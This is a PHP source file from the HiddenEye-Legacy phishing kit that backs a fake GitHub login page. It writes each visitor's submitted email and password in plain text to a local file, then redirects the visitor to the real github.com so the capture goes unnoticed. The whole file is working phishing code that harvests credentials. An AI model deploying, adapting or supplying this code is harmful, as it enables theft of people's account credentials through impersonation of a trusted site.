HiddenEye-Legacy/WebPages/GitHub/login.php

7 lines
193 B
PHP

<?php
include 'base.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://github.com');
exit();